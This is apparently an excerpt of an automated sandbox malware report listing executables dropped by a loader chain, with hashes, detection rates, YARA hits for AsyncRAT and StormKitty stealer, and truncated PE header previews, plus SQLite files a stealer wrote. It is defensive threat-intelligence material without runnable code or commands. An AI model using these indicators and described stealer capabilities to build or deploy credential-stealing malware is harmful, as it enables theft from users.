SHA-512:	EC250115B686A8D8EA14E3551F9CF43C2C17A42ED79EBC99A77F0579455ED72BBC2314D58340BBBEBB83B1CB66BB189D8AA1168D1B6555A81AAB5B8E5B05E742
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....kg.........."......:.......................@.......................................@.....................................<....0.......................@..............................(........_..................p............................text....8.......:.................. ..`.rdata......P.......@..............@..@.data...T'..........................@....tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B.bss.........`......................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	5.896949765249067
Encrypted:	false
SSDEEP:	3072:0e8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gTmwARE+WpCc:w6ewwIwQJ6vKX0c5MlYZ0b2r
MD5:	FAFFBA70209547222069C4E849867640
SHA1:	259CD363E17F0E54DA5E139504B0DA3F996185C2
SHA-256:	A3FC394038179D7F7F6F478F23A9BE89255A277A75CA93228B417E5C0BFFE22D
SHA-512:	DDB7A7C285E84E1461C7471BFEAD61E09A6EAD9124DE2CBAB5FC13EA64B846D46B5B87DF3E688A0450B4B7A36FBFFFF06AD70990DD4670CEED7EA458826C6EEC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: infostealer_win_stormkitty, Description: Finds StormKitty samples (or their variants) based on specific strings, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Sekoia.io Rule: rat_win_asyncrat, Description: Detect AsyncRAT based on specific strings, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Sekoia.io Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....lg................................. ........@.. ....................... ............`.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........C...........................................................................r...p..................................6.r...p.o.................."..s^......>..sf...%.}"..........0..........s..........o.....o......0..........s..........o.....o.......sV...2.o....sR......2.o....sL.......0../.......#..........o.... ....(......(....,..#.........N...(....(....o....".o"...i...&..lo#.....".o"...k...&..lo#......0.."..........o......(....,...

C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	512512
Entropy (8bit):	7.656506729602759
Encrypted:	false
SSDEEP:	12288:KZqOSYt4cgd2+H+vX8otxBVOm79J9T5mO26aKCKRdj:KsOSKgx48cbt526MKHj
MD5:	1C21807FE5D68CDBE4B25DB1F98D0178
SHA1:	4433FA96D7EA5F5F350C1D0E2DCC1193FB0A537B
SHA-256:	EE568D0EAFBA58939DF020D8E1B20BAFC58DD27A3BA251EDF5F2910826D61362
SHA-512:	DB8AF483799A9A4F900575EA7E9C87676A4594B471FDA9AA78DC30D3C246EC33F7B76BA3B37D8B034143499B94F0C6112256635CA97B426328CB03FDFC7E0527
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....kg.........."......:.......................@.......................... ............@.....................................<....0.......................@..............................(........_..................p............................text....8.......:.................. ..`.rdata......P.......@..............@..@.data...T'..........................@....tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B.bss.........`......................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2668544
Entropy (8bit):	6.1024828899386625
Encrypted:	false
SSDEEP:	49152:CAT1rDm9Jeg99E2spwr44UaaDB8v+oyLfwt3LE3eFqZHNZ25WYDo6fsWc6jlOaSo:CATNI9G2sOr44UaaDB8moVt3LE3eFqZw
MD5:	87330F1877C33A5A6203C49075223B16
SHA1:	55B64EE8B2D1302581AB1978E9588191E4E62F81
SHA-256:	98F2344ED45FF0464769E5B006BF0E831DC3834F0534A23339BB703E50DB17E0
SHA-512:	7C747D3EDB04E4E71DCE7EFA33F5944A191896574FEE5227316739A83D423936A523DF12F925EE9B460CCE23B49271F549C1EE5D77B50A7D7C6E3F31BA120C8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 48%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.Gra.)!a.)!a.)!.** l.)!., ..)!.- r.)!p-* s.)!p-- q.)!p-, G.)!.( d.)!a.(!?.)!.-! `.)!.-.!`.)!.-+ `.)!Richa.)!................PE..L.....eg.................&.........P.#.......&...@...........................).......(...@...................................'.<.....'.}.....................(..j....'.T...........................@.'.@.............&.@............................text.....&.......&................. ..`.rdata..,.....&.......&.............@..@.data.........'.......'.............@....fptable......'.......'.............@....rsrc...}.....'.......'.............@..@.reloc...j....(..l...L(.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	540672
Entropy (8bit):	7.614709628313703
Encrypted:	false
SSDEEP:	12288:huB9du8NOZx84E5YoShCwrp1OkwWFewdYHMUzN4r52ki:i9du88Zx8VAwBkewVUckki
MD5:	9AB250B0DC1D156E2D123D277EB4D132
SHA1:	3B434FF78208C10F570DFE686455FD3094F3DD48
SHA-256:	49BFA0B1C3553208E59B6B881A58C94BB4AA3D09E51C3F510F207B7B24675864
SHA-512:	A30FB204B556B0DECD7FAB56A44E62356C7102BC8146B2DFD88E6545DEA7574E043A3254035B7514EE0C686A726B8F5BA99BCD91E8C2C7F39C105E2724080EF0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...WZig..........".................R.............@.......................................@.................................dH..<...............................p....................................................J..l............................text...+........................... ..`.rdata..\|...........................@..@.data....%...`.......J..............@....tls.................`..............@....reloc..p............b..............@..B.bss................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023282001\7d66ff7c35.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2997760
Entropy (8bit):	6.551389179332118
Encrypted:	false
SSDEEP:	24576:iLrBn00q7pq7QKLT7tGAyhypbF0aNvGxBXrLrTYcXyvoMCLhCMUSUmyeXPIJ1D/7:iLdn8sRjli3AOygMCVCxmRXPGrBrA
MD5:	27E0A573048FADB3DD4B3B2454C8EDA5
SHA1:	C841C7FD14F4982E37AED56B25C0D748902FA9E2
SHA-256:	6D6884E9912854C20C4DEA409280402B3E27A0448407AD7F37C3FB642EE60525
SHA-512:	AB59C135D12624748A9C1275D99D65CF479A96A3D6C3A9BE948AF2C160EBC703B632CF923C9CB6C62CDE8029D57DDBBDE6AFFC2A12FA0FE4D8CFE91A8A6C2FFB
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................0...........@...........................0......X....@.................................Y@..m............................A...................................................................................... . . .......d..................@....rsrc .....0.......t..............@....idata .....@.......t..............@...xkuacxgz.0+..P..."+..v..............@...pzmqirjh......0.......-.............@....taggant.0....0.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023283001\4f6ebb22d5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2282496
Entropy (8bit):	7.977141663846527
Encrypted:	false
SSDEEP:	49152:zbhNKaAGXnfj1V5GqSGIK7+yo22YdBwxpLwzvysDxeAPY01Y:/bHdGqCKSKdBwPUBDhw01Y
MD5:	71B104246AC3F43D058E7C67E8B07DEF
SHA1:	9CA447F8443A95DC7BFAF082AE88DB7C338CB580
SHA-256:	2EF46EDD099D06C685F70182337F9F0E1A8DD36B2977509EB5A309582F72E9C8
SHA-512:	4C58B1B89FFD82BEF5249ABE87506A0FB904384C239798D70EA4F5D5745168E143F0FD9340C52D526E997196DA4315906CEEDFAE8A923BDE26CC502C73B5BE3E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 57%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|...T"................@.............................0#.....T.#...`.......... ......................................<............"".................. #. .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc....0"......$".................@..@.reloc.. .... #.......".............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023284001\5f7e5e6f99.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	504832
Entropy (8bit):	7.648125897370556
Encrypted:	false
SSDEEP:	12288:2ZqOSYt4cgd2+kybsmwawsMHkmeuTtFRsssTzTgfbecS0aN:2sOSKgx75TZYk1Am8fq/0e
MD5:	EDDFECE1B9A053D57735A6FA7A3C7EF8
SHA1:	3D33114DB94B9EE861CE361B30C6EBF09D212B46
SHA-256:	7B1C74BECEDC4D836C2B362D300E43DCCE639D2B6F5949D0A3F43B1D790AFC68
SHA-512:	03701259D5D1C76F60CB14481A97424207564C7C514AB6E4A74D8B682C0D2CB739AB70B52FF5A14BE98D329CA5BFA571F5660EC7B9CDBC77F32C8EBCBD4423C7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 35%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....kg.........."......:.......................@.......................................@.....................................<....0.......................@..............................(........_..................p............................text....8.......:.................. ..`.rdata......P.......@..............@..@.data...T'..........................@....tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B.bss.........`......................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023285001\fe4b3524c6.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4472320
Entropy (8bit):	7.98532948304534
Encrypted:	false
SSDEEP:	98304:vAx5/WplbQ6CxuaEWu9jz4ymioFziUAnVJGt:YxojbQ6zaEWGjk9ioFfQJG
MD5:	46F2CE87FF70ECD81CEF884655F82EA3
SHA1:	B236341BE179023437F850DF56B27DAC08BB1A05
SHA-256:	B187942302ACFC0C1ED1390B5554950F9A8DA7FC6EF53F93B78DE85CA0816E49
SHA-512:	52037FFAC32B792F86810B84A7F6F1939C7E2720C602D84675BEF0F5E3D927A58304C50B883A7207ED2910C12A91E320865ED72AB3A850B5FC468F2A1104FDD7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...`....... I...@..................................kD...@... ............................._.m.s.....m...............p......E..............................\E...................................................... . ..m.......(.................@....rsrc.........m.......(.............@....idata ......m.......(.............@... ..8...m.......(.............@...jbmcqnop........x....(.............@...sxtwdxzr.....P........D.............@....taggant.0...`..."....D.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023286001\5f4a2ffa3a.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1792512
Entropy (8bit):	7.733826199275502
Encrypted:	false
SSDEEP:	49152:/Lpy1FpByTAiOejkhs6T3lmbsMhTKKCyvhHC7lpWdonxj:Fy1FpByTAiOejkhsI36FTKKCyvI7jWiV
MD5:	0F239CE79A2362594E54430B27A667EB
SHA1:	E02C82112E68F825E0AC0A1223F82A63A18E64D0
SHA-256:	00F50FA2A4AD40AC6BD886634494A3A99E17BEE9B7C1DC3ACAD59379498217C4
SHA-512:	B6D38EE509E6A7B871AB026DD4D6E5DA3D007B52358193103C3FFE41C3B6BA9F07B174942AAAE7945EAC4CEC900E78F0035C2693BF49BCB2E71E39EC85FDE715
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................(.....V....................@.................................ch....@... .........................................0....................`..8J..........................H.......................L................................text...............................`..`.data...............................@....rdata..............................@..@.bss.....................................idata...............j..............@....CRT....4............z..............@....tls.................\|..............@....rsrc...0............~..............@..@.reloc..8J...`...L..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023287001\98f8ef74ec.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1885696
Entropy (8bit):	7.948069201610694
Encrypted:	false
SSDEEP:	49152:T6LdQJvCGy4qv8bM30XtiihD/g6UWCQf8kq2ht:T6Ls6avbMkdiiZgeP8m
MD5:	4EAE4944D789D3440760E32531707AD7
SHA1:	9875755EA86CB649E1A9375CC83D3645AB83B493
SHA-256:	52CA4ACAE645D61221E7859F08EF4295F838C0A0DF9A796B7F02B584CBABCBA1
SHA-512:	E9D999AA55C95EDFBE00F20F52B2D567130BB9B8E3783A8A3C1E849C7CB70BC6AA8D13707671B2AB1F7F89D55AF8F3BD3D5BE3FF8CDE5743FAFBC5E07BE0B276
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................@J...........@..........................pJ...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...dqaezxce.@..../..@...^..............@...znjwjjbm.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1023288001\fd096224d5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1874432
Entropy (8bit):	7.947191594631437
Encrypted:	false
SSDEEP:	49152:U63dzmC0Ny/YLpDIRa8R5usQgGSG+VITxKx0:UmzoNyQ2Ra8RRqKe
MD5:	C516DF02565FC8A1056C1027A2135536
SHA1:	184D139C65CFF98613D1AED68C1CFD4584E5F5CE
SHA-256:	8DECACE8FFC10D29D867575AE17DA49BCD3D3AACA69C9287A2FCC7A7D0952D0C
SHA-512:	2462258D90A95CCFBAC58D6C31816C8B40D029DFB9BB56877CCB1C700858FC8657AA82AB5226B6837EF99E026F3B67F5032D68FE489A628F9D6B0E216B1B1D6A
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................I...........@.......................... J......V....@.................................Y@..m....0.......................A...................................................................................... . . .......d..................@....rsrc........0.......t..............@....idata .....@.......v..............@... ..*..P.......x..............@...rnotmvkb....../......z..............@...hsvghaut......I......t..............@....taggant.0....I.."...x..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1901056
Entropy (8bit):	7.950394200392934
Encrypted:	false
SSDEEP:	24576:9lfqjWT5m2YWMD4qLz98KnZysYo4WjTXJXNbk517KKhK1xUzb/D9Yqn3rFet:9lrg2YkouKIynTvI519g1+J0
MD5:	3FA3842503DB7F65438CDDE8B7A7DD0F
SHA1:	A0BD7985356D95815D48319D09D4CC6563F1D79A
SHA-256:	5FA5BA975EC4C3D2EC2F47A7B4E528DFD23CF4F6636610E0A393CB648661003F
SHA-512:	5F1E36269AB77E4D2B848ACC40FF14BE93027272DBCEB4CE8348638CF5DE19716BE4B6CDE01CAEADE55A4C5555ADE559DF8BEBFF0FD49C0ADB0FC858AEC24096
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................@K...........@..........................pK...........@.................................W...k...........................t!K.............................$!K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...csnwaitg.....@1.....................@...civfgwbo.....0K.....................@....taggant.0...@K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe

Download File

Process:	C:\Users\user\Desktop\i8Vwc7iOaG.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243008
Entropy (8bit):	6.650093644272246
Encrypted:	false
SSDEEP:	49152:ihw05uwGDAu9kS8AmainjRha/nxaIYd1s6l8ua3yflGAM:ovu9kS8AmainjLgn4LM6l8t3QLM
MD5:	D297F9F22080C6F66B4E9C9156A6FF86
SHA1:	BEF0F2E329D9DB6BAFE18B63482545B79B3D3C47
SHA-256:	D2A41394DA3C958EEECD0C43A72E5C401FD5209E462B0035BD1BA5DD9B4A6B46
SHA-512:	4FC5D9229C3174FB76947190458D56FF76133F286295AB4CE439E64DCC5DB5D0289C734EB4C7EE49DB7636CB2E9B22649009C7B7F920806D327710BF2618BB94
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.......1...@.................................W...k...........................Pl1..............................l1..................................................... . ............................@....rsrc...............................@....idata ............................@...bwzzahtg..........................@...rhjmaeag.....p1......V1.............@....taggant.0....1.."...Z1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaiintain.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	7.3648707161155675
Encrypted:	false
SSDEEP:	49152:IX9AV3uOFXm1sfcqpN/gjyD4VnBBOj9a:IwBcq7gGg
MD5:	AA835D6591F41D6D07832CF3D74F53A2
SHA1:	F21285AC0A8B7BDDE5E5891C201702CBE1ED1F63
SHA-256:	7F0EE4BDBB8C63ADC31C9ACF4DDF598C6C43EAD11BCB8C814D0F0A3C5233FA40
SHA-512:	DA237435B9D92456A355BAD6EE0EFF0BB912280DBC20DBD61E05C9D1CC742F327FF0BCE99156B0A20E95FFAFBEBE0D70D52303469EC036AB911650A40B0977CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kg................................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......................................................................................................................".'.<.>.&.......................................................................................................................d........'......@B..............................;...Z...x.......................0...N...m................................................................................. .'./.".[.].(.)...........\...( ) ............................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1645056
Entropy (8bit):	7.3689768353218215
Encrypted:	false
SSDEEP:	49152:4XF3BLXp1wWoU0NxvEWc0H22NOuwBOj1a:63BLZStNyJ0H2ia
MD5:	92A9F111C456947F39B59EB9F13E4BF6
SHA1:	644253E99442B76BA5191A84A7DB0A956988BA95
SHA-256:	7DA88908E482FEC4CA9FD15C846070A79F223F358E65CC2F74416F10E030C9D6
SHA-512:	2A4B8D8D042E8E917612661F40F7030D8856D9BB97647331B86E6D86FC9B485A0F6E68A2A8C7A4B7CF5B393B2020876E3BCA1B6C6DA4692C6C1CD64868EA3353
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(.kg.........."...................... ....@...... .......................`............`...@......@............... ...............................@............................................................................................... ..H............text........ ...................... ..`.rsrc........@......................@..@........................................H.......................................................................................................................".'.<.>.&.......................................................................................................................d........'......@B..............................;...Z...x.......................0...N...m................................................................................. .'./.".[.].(.)...........\...( ) ....................................

C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Download File

Process:	C:\Users\user\Desktop\i8Vwc7iOaG.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5169664
Entropy (8bit):	5.544955031845111
Encrypted:	false
SSDEEP:	24576:hcdSpdXoWs2ps+xunxcADxJN26yU5fd7Kp3fL1AbtY1W2Pb1eDMcPOwEmyrbvpyL:aWRs+hADNj7KD1V+5WFEfxVzT1wG3
MD5:	97B80E7A522A3D40515E954A1FB4B428
SHA1:	A08336FCD36B3FEC4EFD009375C57F4E7FA452E7
SHA-256:	594242F39E0A43970C2C6B459BAADE07C3CDC8DF4DCADF89AD6166DC12D5F16C
SHA-512:	3C58D0092977242A386107E0D74E376DE0131523B139E09BA93D5604637AF22017C0EC2359C42D1837F775137432EFEBD898102CE3DC22E66EDB45A5F527A204
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@.......................... O......(O...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...hsfspruu. ...$......$.............@...ilcadzlg......N.......N.............@....taggant.0....N.."....N.............@...........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243008
Entropy (8bit):	6.650093644272246
Encrypted:	false
SSDEEP:	49152:ihw05uwGDAu9kS8AmainjRha/nxaIYd1s6l8ua3yflGAM:ovu9kS8AmainjLgn4LM6l8t3QLM
MD5:	D297F9F22080C6F66B4E9C9156A6FF86
SHA1:	BEF0F2E329D9DB6BAFE18B63482545B79B3D3C47
SHA-256:	D2A41394DA3C958EEECD0C43A72E5C401FD5209E462B0035BD1BA5DD9B4A6B46
SHA-512:	4FC5D9229C3174FB76947190458D56FF76133F286295AB4CE439E64DCC5DB5D0289C734EB4C7EE49DB7636CB2E9B22649009C7B7F920806D327710BF2618BB94
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.......1...@.................................W...k...........................Pl1..............................l1..................................................... . ............................@....rsrc...............................@....idata ............................@...bwzzahtg..........................@...rhjmaeag.....p1......V1.............@....taggant.0....1.."...Z1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1622.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1633.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

